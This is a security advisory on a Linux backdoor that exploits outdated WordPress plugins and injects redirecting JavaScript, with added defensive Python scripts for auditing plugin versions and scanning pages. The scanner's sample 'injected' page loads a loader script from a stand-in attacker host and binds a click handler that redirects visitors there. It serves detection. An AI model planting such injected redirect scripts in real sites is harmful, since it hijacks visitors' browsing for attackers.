Linux backdoor malware infects WordPress-based websites

Doctor Web has discovered a malicious Linux program that hacks websites based on a WordPress CMS. It exploits 30 vulnerabilities in a number of plugins and themes for this platform. If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted webpages are injected with malicious JavaScripts. As a result, when users click on any area of an attacked page, they are redirected to other sites.

For many years cybercriminals have been attacking WordPress-driven websites. Information security experts have recorded cases in which various vulnerabilities of the WordPress platform were used to hack sites and inject malicious scripts into them. An analysis of an uncovered trojan application, performed by Doctor Web's specialists, revealed that it could be the malicious tool that cybercriminals have been using for more than three years to carry out such attacks and monetize the resale of traffic, or arbitrage.

Dubbed Linux.BackDoor.WordPressExploit.1 in accordance with Dr.Web anti-virus classification, this malware targets 32-bit versions of Linux, but it can also run on 64-bit versions. Linux.BackDoor.WordPressExploit.1 is a backdoor that is remotely controlled by malicious actors. Upon their command, it is able to perform the following actions:

Attack a specified webpage (website);
Switch to standby mode;
Shut itself down;
Pause logging its actions.

The main functionality of the trojan is to hack websites based on a WordPress CMS (Content Management System) and inject a malicious script into their webpages. To do so, it uses known vulnerabilities in WordPress plugins and website themes. Before attacking, the trojan contacts its C&C server and receives the address of the site it is to infect. Next, Linux.BackDoor.WordPressExploit.1 successively tries exploiting vulnerabilities in the following outdated plugins and themes that can be installed on a website:

WP Live Chat Support Plugin
WordPress – Yuzo Related Posts
Yellow Pencil Visual Theme Customizer Plugin
Easysmtp
WP GDPR Compliance Plugin
Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972)
Thim Core
Google Code Inserter
Total Donations Plugin
Post Custom Templates Lite
WP Quick Booking Manager
Facebook Live Chat by Zotabox
Blog Designer WordPress Plugin
WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233)
WP-Matomo Integration (WP-Piwik)
WordPress ND Shortcodes For Visual Composer
WP Live Chat
Coming Soon Page and Maintenance Mode
Hybrid
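Every entry point the trojan has is an unpatched plugin or theme, so the first defensive check is an inventory of what is installed and at which version. The script below is an added example, not Doctor Web's code and not part of WordPress: it reads the header block that every WordPress plugin carries at the top of its main PHP file ("Plugin Name:", "Version:"), using the same line pattern WordPress itself applies to file headers, and reports plugins whose version is below an operator-supplied minimum. The function names (parse_plugin_header, version_at_least, audit, scan_plugins_dir), the sample header and the MIN_VERSIONS map are my constructions; the version numbers in MIN_VERSIONS are placeholders, not real fix levels, and must be filled from each plugin's changelog or advisory.

```python
"""Audit installed WordPress plugin versions against minimum fixed versions.

Added example (not Doctor Web's or WordPress's code). Reads the header block
that every WordPress plugin carries at the top of its main PHP file
("Plugin Name:", "Version:") and reports plugins below an operator-supplied
minimum version. MIN_VERSIONS holds PLACEHOLDER values, not real fix levels.
"""
import os
import re
import sys
from typing import Dict, List, Optional, Tuple

# Same line pattern WordPress itself uses when reading file headers.
_NAME_RE = re.compile(r"^[ \t/*#@]*Plugin Name:(.*)$", re.M)
_VERSION_RE = re.compile(r"^[ \t/*#@]*Version:(.*)$", re.M)


def parse_plugin_header(php_source: str) -> Optional[Dict[str, str]]:
    """Return {'name': ..., 'version': ...} for a plugin main file, else None."""
    m_name = _NAME_RE.search(php_source)
    if not m_name:
        return None
    m_ver = _VERSION_RE.search(php_source)
    return {"name": m_name.group(1).strip(),
            "version": m_ver.group(1).strip() if m_ver else ""}


def _split_version(v: str) -> Tuple[List[int], bool]:
    """'1.4.2' -> ([1, 4, 2], False); '2.0-beta1' -> ([2, 0], True)."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)(.*)$", v)
    if not m:
        return [0], True          # unparsable: rank it as the oldest possible
    nums = [int(x) for x in m.group(1).split(".")]
    return nums, m.group(2).strip() != ""


def version_at_least(installed: str, minimum: str) -> bool:
    """True if `installed` >= `minimum`. Missing components count as 0 and a
    pre-release tag ranks below the bare release number."""
    a, a_pre = _split_version(installed)
    b, b_pre = _split_version(minimum)
    width = max(len(a), len(b))
    a += [0] * (width - len(a))
    b += [0] * (width - len(b))
    return (a, not a_pre) >= (b, not b_pre)


def audit(installed: Dict[str, str], minimums: Dict[str, str]) -> List[str]:
    """One finding per installed plugin that is below its required version.
    Both maps are keyed by the header's 'Plugin Name' value."""
    return [f"{name}: installed {installed[name]!r} < required {min_ver}"
            for name, min_ver in minimums.items()
            if name in installed and not version_at_least(installed[name], min_ver)]


def scan_plugins_dir(plugins_root: str) -> Dict[str, str]:
    """Walk wp-content/plugins. A plugin is either a sub-directory whose first
    top-level .php file with a 'Plugin Name:' header names it, or a bare .php
    file directly under plugins/ (single-file plugins)."""
    found: Dict[str, str] = {}
    for entry in sorted(os.listdir(plugins_root)):
        path = os.path.join(plugins_root, entry)
        candidates = [path] if os.path.isfile(path) else [
            os.path.join(path, f) for f in sorted(os.listdir(path))]
        for php in candidates:
            if not php.endswith(".php") or not os.path.isfile(php):
                continue
            with open(php, encoding="utf-8", errors="replace") as fh:
                header = parse_plugin_header(fh.read(8192))   # header is at the top
            if header:
                found[header["name"]] = header["version"]
                break
    return found


# Constructed sample of a plugin main-file header (not taken from a real plugin).
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: WP GDPR Compliance
 * Description: constructed sample header
 * Version: 1.4.2
 */
"""

# PLACEHOLDER minimums. Keys must equal the header's Plugin Name; values must
# be taken from each plugin's changelog or the relevant advisory.
MIN_VERSIONS: Dict[str, str] = {
    "WP GDPR Compliance": "1.4.3",       # placeholder, not a real fix version
    "Blog Designer": "9.9.9",            # placeholder, not a real fix version
}

if __name__ == "__main__":
    if len(sys.argv) > 1:                 # e.g. /var/www/html/wp-content/plugins
        installed = scan_plugins_dir(sys.argv[1])
    else:                                 # offline demo on the constructed header
        hdr = parse_plugin_header(SAMPLE_HEADER)
        installed = {hdr["name"]: hdr["version"]}
    for line in audit(installed, MIN_VERSIONS) or ["no plugin below its minimum"]:
        print(line)
```

Run it with the path to wp-content/plugins as the only argument to audit a real install; without an argument it audits the constructed header. Themes carry an analogous header in style.css ("Theme Name:", "Version:") and can be covered with the same two regular expressions pointed at that file.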

If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server. The injection is done in such a way that when the infected page is loaded, this JavaScript is initiated first, regardless of the original contents of the page. From that point on, whenever users click anywhere on the infected page, they are redirected to the website the attackers want them to visit.
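The two observable traits described above, a remotely hosted script placed so that it runs before any of the page's own content and a page-wide click handler that navigates elsewhere, can be checked for in a fetched copy of a site's HTML. The following scanner is an added example, not Doctor Web's code and not part of WordPress; its heuristics, function names (analyse_page, _ScriptCollector) and the two sample pages are my constructions, and the attacker hostname uses the reserved .invalid domain.

```python
"""Flag injected, redirect-style JavaScript in a fetched WordPress page.

Added example (not Doctor Web's or WordPress's code). Two heuristics follow
from the behaviour described in the advisory: (1) a script pulled from a host
other than the site's own that sits before any real page content, so it runs
first; (2) an inline script that binds a document-wide click handler and
navigates elsewhere. The sample pages below are constructed for the demo.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

# Tags that carry no visible content; seeing only these before a <script>
# still counts as "before any page content".
_STRUCTURAL = {"html", "head", "body", "meta", "title", "link", "style", "base"}

_CLICK_RE = re.compile(r"""addEventListener\s*\(\s*['"]click['"]|\bonclick\s*=""", re.I)
_NAV_RE = re.compile(
    r"""location(?:\.href)?\s*=[^=]|location\.(?:assign|replace)\s*\(|window\.open\s*\(""",
    re.I)


class _ScriptCollector(HTMLParser):
    """Records every <script> in document order, with its src, inline body
    and whether any content element preceded it."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Dict] = []
        self._current: Optional[Dict] = None
        self._content_seen = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "body": "",
                             "before_content": not self._content_seen}
            self.scripts.append(self._current)
        elif tag not in _STRUCTURAL:
            self._content_seen = True

    def handle_data(self, data):
        if self._current is not None:       # inside <script>...</script>
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._current = None


def analyse_page(html: str, site_host: str,
                 trusted_hosts: Set[str] = frozenset()) -> List[str]:
    """Return human-readable findings for one page's HTML. `site_host` is the
    site's own hostname; `trusted_hosts` are CDNs the site legitimately uses."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    allowed = {site_host.lower(), *(h.lower() for h in trusted_hosts)}
    findings: List[str] = []
    for s in collector.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname   # None for a relative (same-site) URL
            if host and host.lower() not in allowed and s["before_content"]:
                findings.append(
                    f"external script from {host} loaded before any page content: {s['src']}")
        elif _CLICK_RE.search(s["body"]) and _NAV_RE.search(s["body"]):
            findings.append("inline script binds a click handler that navigates away from the page")
    return findings


# Constructed sample pages for the demo (attacker host is a reserved .invalid name).
CLEAN_PAGE = """<!DOCTYPE html><html><head><meta charset="utf-8"><title>Blog</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script></head>
<body><h1>Hello</h1><script>console.log("theme ready");</script></body></html>"""

INJECTED_PAGE = """<script src="https://traffic-redirector.invalid/loader.js"></script>
<!DOCTYPE html><html><head><title>Blog</title></head>
<body><h1>Hello</h1>
<script>document.addEventListener('click', function () {
  window.location.href = 'https://traffic-redirector.invalid/go';
});</script></body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(label, analyse_page(page, "blog.example") or ["nothing flagged"])
```

Both checks are heuristics: a legitimate theme may load a tag-manager script from a CDN in the head, which is why trusted_hosts exists, and the inline check only sees scripts embedded in the page, not logic inside the fetched remote file. Diffing the findings of a known-good crawl against a fresh one is the practical way to use this, since the malicious script's host and position are the only two things that change.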

The trojan application collects statistics on its work. It tracks the overall number of websites attacked, every case of a vulnerability being exploited successfully, and additionally the number of times it has successfully exploited the WordPress Ultimate FAQ plugin and the Facebook messenger from Zotabox. In addition, it informs the remote server about all detected unpatched vulnerabilities.

Along with the current modification of this trojan application, our specialists also discovered its updated version Linux.BackDoor.WordPressExploit.2. It differs from the original one by the C&C server address, the address of the domain from which the malicious JavaScript is downloaded, and also by an additional list of exploited vulnerabilities for the following plugins:

Brizy WordPress Plugin
FV Flowplayer Video Player
WooCommerce
WordPress Coming Soon Page
WordPress theme OneTone
Simple Fields WordPress Plugin
WordPress Delucks SEO plugin
Poll, Survey, Form & Quiz Maker by OpinionStage
Social Metrics Tracker
WPeMatico RSS Feed Fetcher
Rich Reviews plugin

Both trojan variants have also been found to contain unimplemented functionality for hacking the administrator accounts of targeted websites through a brute-force attack, by applying known logins and passwords from special dictionaries. It is possible that this functionality was present in earlier modifications, or, conversely, that attackers plan to use it in future versions of this malware. If such an option is implemented in newer versions of the backdoor, cybercriminals will even be able to successfully attack some of those websites that use current plugin versions with patched vulnerabilities.
